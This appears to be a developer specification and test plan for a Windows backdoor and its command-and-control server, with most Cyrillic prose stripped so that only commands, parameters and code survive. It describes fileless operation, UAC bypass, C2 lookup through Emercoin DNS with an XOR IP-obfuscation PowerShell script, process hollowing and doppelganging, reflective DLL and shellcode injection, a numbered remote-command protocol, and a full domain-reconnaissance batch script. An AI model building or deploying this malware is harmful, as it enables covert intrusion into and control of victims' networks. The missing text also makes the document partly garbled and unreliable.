 BACKDOOR
 


 backdoor (  ),     ,       ,
        (fileless-)
  ""  "" - -.


Backdoor    :
*-    (  )
-   ,        
-    UAC
-    
-        (emercoin dns,  ,      -    )
-   ,        (inetcpl.cpl ->  ->  -)
-        : **
  -    
  -    
  -     
  ( :       -   ,   ,      -         )
  -  
  -  
  -      ( ,   )
  -  trusted     
  ( : cmd /c net view /all  |  /c net view /all /domain  |  /c nltest /domain_trusts /all_trusts +     administrator,    )
  -   
-         (  -  TCP)
-     .exe  .dll
-            (..        ,
        ).
-       .ru/ -   ;    
   .
*-   

*   : ,    , ..     .
     (, , )      .
       ,   ()        .
**             .

   (    shell)   ,   .
     . ,        ,      .exe ( ).




0.  
    :
-      ,      (fileless)
-     
-    - Windows 7/Windows 2008 ( R2)
-    - 32- ,      32-,    64-  ( ).
- 64-      .

Fileless ,       powershell, wscript, jscript     Windows .
   -  ,    -     
(,   .p12, .pfx, .crt ),   .exe  ,    (ntfs file streams)
   .

        "   ".
,      -      Visual Studio (,   ?),
 -  , .

        ( ,  Visual Studio -  MinGW,  clang)     .

       .exe,     .dll (     ,
..  .dll       .exe).
      .dll -  DllMain(DLL_PROCESS_ATTACH)

1. 
     .
  md5-   "_%windir%._._%windir\system32%.___workgroup",
   hex-,   10-      128- .
-     
-            
-      
-    

     -   .     .
      ;        -    .

          ,   ___     (.).

   ,      .
   ,     (,     ).


2.    
     :
-     
-     DNS-

        ,   .
         .


   BACKEND

1.  
     HTTP(S).       (DNS, ICMP)       ,
  - HTTP.

    URI  ,    , 
GET /%id%/%operation%/%params%

  HTTP- 200  ;  ,   200   .

           Cookie   group   .

      ,   .
     XOR.      HEX-.
,         
     .
,       ,    
   .

      (POST)       POST-.

       :
- %cmdline%     ,   .        .
 ,    "10 https://site.com/file.xyz -c -z -a"     "-c -z -a",
    %cmdline%   .
-       %id%,        .
,     12345    "10 1 0 https://site.com/file.xyz -c -z -a -i %id%"    
  "-c -z -a -i 12345"    .
-         VERS,   .

         - .

    cmd/powershell    CreateProcess().
  .exe       Process Hollowing/Process Doppelganging.

2.    
       :
-  
-     
-   emercoin- ()

          .

          (     ),  :
-    
-          .

, :
-     ,        
-    ,           .

  IP-   Emercoin,   IP-   XOR 254   .
, 124.245.101.251 (  DNS-) -> 130.11.155.5

.. DNS-  ,         DNS- .

  ipxor.ps1  PowerShell:
$ip = read-host -prompt "Enter IP";
write-host $ip;
$newip = '';
($ip.split('.') | foreach {
    $octet = [byte] ( $_)
    $octet = $octet -bxor 254;
    $newip = -join($newip,'.',$octet);
}
)
write-host $newip;


4.  :
GET /%id%/2

:   "_ "

   :
-    5 
-         NOP (.)

    (     -  timeout),
.. ,         .
    ,  HTTP-    ,      14 ( ).

   :

0 NOP %time% -  .  -  ,          .
1 %time%    .  -  ,          .
 time .
*         .cmd- ( 12)
10 %runtype% %timeout% %mask_process% %URI% %cmdline% -    .exe-
10 4 [%mode% %cmdline%]
- %runtype% - 1    (CreateProcess;    )
              2    process hollowing (       )
              3    process doppelganging (       )
                (   Process Herpaderping)
              4 :       .
                  ,       (    0,   )
                %mode% -  :
                0 -   ( ,       )
                1 - exe-,  : filename.exe %cmdline%
                2 - dll-,  : rundll32 filename.dll,%cmdline%
                3 - dll-,  : regsvr32 /s filename.dll %cmdline%
                4 - js- (    )
cmdline -    
 mode=2   -  - -    
              5      . cmdline      .
- %timeout% -   ,  . 0 -     (,      )
    ,              .
   ,              (         ).
     ,     ,     ,        .
        ,        .
- %mask_process% -     process hollowing/process doppelganging
                   0 -  
                   1 - notepad.exe
                   2 - explorer.exe
                   3 - svchost.exe
                   4 - cmd.exe
- %URI% - ,     ( );    ,   -      "could not download file from %uri%"
   2    (    ),     GET-.
- %cmdline% -     ()
11 %runtype% %pid% %timeout% %URI% %cmdline% -    .dll-
- %runtype%  0 - rundll    rundll32.exe  :
                        rundll32.exe dllname.dll,%cmdline%
             1 - regsvr    regsvr.exe  :
                        regsvr.exe dllname.dll %cmdline%
                           dll  DllRegisterServer
             2 - regsvr (silent)     1,     "" ,  : regsvr32.exe /s dllname.dll %cmdline%
             3 - reflective injection   %pid%.
                 3  4   
                      https://github.com/dismantl/ImprovedReflectiveDLLInjection
                    (bootstrap function,   - ReflectiveLoader)    %cmdline.
             4 - reflective injection   
- %pid%      0   ( runtype 0 1 3)
              0 -     
12 %runtype% %timeout% [%cmdline%]\r\n%script% -  .bat-  
- %runtype% - 1     (.   13   )
              2        CreateProcess
- %cmdline% -     (.. ,     %1, %2   .bat- -      cmd.exe!
 
      \r\n
      ,     ;       
13 %runtype% %timeout% [%cmdline%]\r\n%script% -  powershell-  
- %runtype% - 1    
              2        CreateProcess
- %cmdline% -     (.. ,    argv  .ps1- -      powershell.exe!
      \r\n
   2      GET-.
   :
runtype = 1
      ,     STARTUPINFO   powershell.exe,      .
  Powershell  :
  powershell -
runtype = 2
  powershell -executionpolicy bypass -file tmpscript.ps1 %cmdline%
      ,     ;       
14 - reset.    .      (   ),
        .
15 %pid% -   (TerminateProcess)
16 filename -      
17 %hexcode%        , 
      https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/SimpleShellcodeInjector.c
    : AB CD EF 01 23 45 67 - 16-    ,  ,   ,   1 .
     .   shell-  .
18 %timeout%   . ,      ,  .
100   .
     ,     .

5.    
POST /%id%/3
      form/urlencoded.
    .

,      ,     
(   ,      ).

       ,         (    - HTTP- 40*, 50*)
       ,    ,      30 .
   ,     .

5.0.     
        :  ,    (stdout  stderr),    .

pid=1234
stdout and stderr here

   ,     0 (),       .

5.1.    1    
 POST-    form/urlencoded,   :
group=% %
path=      (    fileless )
os=3-7   major-version, minor-version  build  ,     
(,  6.1 build 7600   617600).
os[1]=   (W=Windows)   
os[2]= 
os[3]=ProductInfo https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getproductinfo
 Windows 7 (Version 6.1 build 7600 ProductInfo 0x00)   os[1]=W61&os[2]=7600&os[3]=00
arch= (): 86  64
cname= 
uname= 
av[]= 
avp[]= 
domain=      (   NetWkstaGetInfo)
net=  net view /all
netdomain=  net view /all /domain
net group "Domain Computers" /domain
trust=  nltest /domain_trusts /all_trusts
admin=  net localgroup "administrator" 
admindomain=  net group "domain admins" /dom 
soft=  
ip= IP- 
locale=
tz= 
ps= 
wsl=  WSL/WSL2  

5.2.    100   
 OK   ,         .

5.3.    10-4 
   ,       .
, "",  "Will autoupdate in 60 seconds",  "Cannot proceed"

5.4.    15   
      GetLastError()    TerminateProcess()
   

5.5.    16     
      " ",   x-www-urlencoded  multipart/form-data,     
   .
    Content-Length.
  Content-Type: application/octet-stream
    10 .
     ,      ,  File too large ()

       ;         .

5.6.    17    shell-
   ,   .
:
HEX parse error
Done
Still alive 

5.7.    18    
   ,   .
:
Done
Error anchoring, error code = %ld
Still alive 

6.  
POST /%id%/4
  POST   ,  XOR %id%
      (    -     ).

       -   .
        .


, 

 
-    IP-,  , , ,  ,  
  ( :       ,   )
-      
    ,   ,       ( , / , )
-     (  )

  :
-      (   )
-   
-     /
-   (      .)
-   (    - ,      -   ,
   ( 4))

,     ,        .
       (  ,      ).

 ,  IP-     ,    ""     .

      ( ),    ,
                .

 :
-  (       )
- 
     :
-  (  )
-  (   -   )
-  IP-



1.    IP-
2.  DNS-  Emercoin
3.     
4.     process hollowing/doppelganging
5.  DNS-  TCP-
6.   
7.    


 

    :
-    
-    
-      .

     .

        .
 ()   
-  ,    
-  ,       (  ,    )
-       .
    .

  

     -  , , .
         ,      ,    .

0.      -    , x86  x64.
   ,  .       .
  ,             .
      ,     .
   ,     .
    ,        .
       -        ( ,    ),
    (,     ,       ).

1.     .
2.      ,     .
 ,   5 .   , , .
    "online",      15      .
3.    .
      ( 5 ) -  .
3.1. Get System Info
      ..
3.2. Run .exe     Run Type, Host Process (Mask).
    ,     .dll ( ). , pscp.exe.
  ,          .

*    timeout = background run,      -          .
      .
3.3. Run .dll
TODO
3.4. Run .bat
3.4.1.  -  ,  hostname, whoami, date /t
  ,          .
3.4.2.   .bat-   .          .
  ,          .
3.5. Run PowerShell
3.5.1.  -  ,  $PSVersionTable.PSVersion
(  Powershell)
  ,          .
3.5.2.   .ps1-   .          .
  ,          .
3.6. Reset
   ,    -  (  run .bat  timeout 10000),
    .
  Reset,        done,      .
3.7. Terminate Process
      (pid)
    - (  notepad.exe        ).
     .
3.8. Download File
      (  10)
       ..
        ,       .
3.9. Suicide
     .
      .
4. .
       .
5. .
      ,   .
6. 
6.1.    x86   x64,       x64   ,
    x64 .
  -       .
6.2.1.       QA ( ,      )
6.2.2.        ,      ,    .
6.2.3.        . :         .
6.2.4.      ,       .
6.2.5.   .     .

  

    ,       .
!
     .           .

   

      :
-       
- ,   .

  dyncheck :
-    
-  
    ,    .

          ,  ,
    .


  
   .
    !
1.     .  ()   30      (AM) ,
   .

2.    .     60 .

3.   GET /%id%/2,  POST /%id%/3.

4. . 

4.1. "0 %time%" -   no_operation 30 .
 
       , .. 30     .


4.2.  10.       ,     test32.exe.
 test32.exe   stdout  "test"    .       M.
  10 %runtype% %timeout% %mask_process% %URI% %cmdline%.

4.2.1 "10 1 60 0 %URI% a b c %id%"

    %URI%    test32.exe,
a b c %id% -    test32.exe,    ,    %. %id% - ,      id.

   :
pid=0
msg=program start error

   :
pid=NNNN
stdout=  

    :
pid=NNNN
msg=timeout


 
4.2.2 "10 1 0 0 %URI% a b c %id%"
 ,   4.2.1,  timeout = 0

   :
pid=0
msg=program start error

   :
pid=NNNN
msg=program is running


4.2.3 "10 2 60 1 %URI% a b c %id%" - process hollowing
  

4.2.4 "10 2 0 1 %URI% a b c %id%" - process hollowing, timeout=0
  
 
4.2.5 "10 3 60 1 %URI% a b c %id%" - process doppelganging
  

4.2.6 "10 3 0 1 %URI% a b c %id%" - process doppelganging, timeout=0
  

4.3.  11.       dll,     TestDll32.dll.
 Start  TestDll32.dll  stdout  "test dll - start()".       M.
  11 %timeout% %URI% %cmdline%

4.3.1. "11 60 %URI% Start" 
    %URI%    TestDll32.dll.
  ,    10.

4.3.2. "11 0 %URI% Start" - timeout=0
  



4.4.  12.  cmd .

4.4.1. "12 60 cmd /c cd c:\&&dir" -     bat-
  ,    10.

4.4.2. "12 60 cmd /c\r\ncd c:\\r\ndir" -     bat-
  ,    10.



4.5.  13.  powershell .

4.5.1. "13 60 a b c\r\ncd c:\\r\ndir" -     ps1-
a b c -   ,  .
  ,    10.


4.6.  15.  .
4.6.1. "15 %pid%"
:
msg=MMM

4.7.  100.   . 
4.7.1. "100"
:
msg=OK


    

@echo off

echo General Info:
systeminfo

echo.
echo My Username:
whoami

echo.
echo Network Neighbourghoud:
net view /all

echo.
echo Domain Neighbourghoud:
net view /all /domain

echo.
echo Domain Trust:
nltest /domain_trusts /all_trusts

echo.
echo Installed Programs:
reg query hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s

echo.
echo Installed Programs (wow64):
reg query hklm\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s

echo.
echo Installed Programs (current user):
reg query hkcu\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s

echo.
echo Installed Programs (current user, wow64):
reg query hkcu\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName" /s

echo.
echo Process List:
tasklist

echo.
echo External IP:
powershell -executionpolicy bypass -command "$Servers= @('http://checkip.amazonaws.com','https://ipinfo.io/ip','http://api.ipify.org','https://myexternalip.com/raw','http://wtfismyip.com/text','http://ip.anysrc.net/plain/clientip','http://api.ipify.org/?format=text','http://api.ip.sb/ip','http://ident.me/ip'); $i=Get-Random -Minimum 0 -Maximum 8; Write-Host HTTP-DNS request via $Servers[$i]; $ip=Invoke-WebRequest -UseBasicParsing -Uri $Servers[$i]; write-host $ip.content;"
